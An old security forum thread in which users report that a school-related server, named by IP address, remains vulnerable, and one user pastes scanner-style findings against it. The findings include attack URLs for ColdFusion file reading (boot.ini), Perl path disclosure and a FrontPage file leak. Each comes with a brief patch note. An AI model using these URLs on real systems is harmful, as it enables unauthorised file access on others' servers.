Update
Results 1 to 3 of 3

Thread: Update

  1. #1
    Senior Member
    Join Date
    Dec 2001
    Posts
    304

    Update

    If you remember awhile back a post called k12.edu.
    The post was being able to run arbritary code on their server.
    [ http://www.antionline.com/showthread...hreadid=218780 ]

    I just checked the website to see what it was and i was curious if they ever fixed it.

    i went to http://216.247.78.24 and it came up with some NT service pack update page
    so then i went to http://216.247.78.24:80 and got this
    [see attachment or go to page]

    Guess they never fixed it
    Violence breeds violence
    we need a world court
    not a republican with his hands covered in oil and military hardware lecturing us on world security!

  2. #2
    Banned
    Join Date
    Oct 2001
    Posts
    1,462
    Guess not
    This is the problem with sites like this, a few of them ruin it for everybody else... And they probably used that same exploit, too

  3. #3
    Banned
    Join Date
    Oct 2001
    Posts
    1,462
    Security Issues

    http://216.247.78.24/scripts/*%0a.pl

    Perl.exe is being used as the perl script interpreter - consequently virtual paths can be mapped to physical paths: The /scripts directory maps to d:\216.247.78.24\scripts\. Use PerlIS.dll instead of perl.exe to resolve this problem.


    http://216.247.78.24//_vti_pvt/doctodep.btr doctodep.btr can sometimes contain fragments of server side code.

    http://216.247.78.24//cfdocs/expeval...th=c:\boot.ini ExprCalc.cfm can be used to read files on the web server. Apply the patch from Allaire. See http://www2.l0pht.com/advisories/cfusion.txt for more information.

    http://216.247.78.24//cfdocs/expeval/openfile.cfm openfile.cfm can be used to read files on the web server. Apply the patch from Allaire. See http://www2.l0pht.com/advisories/cfusion.txt for more information.

    This sucks ass.... It took me about 3 seconds to find all of these I think they really need security

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •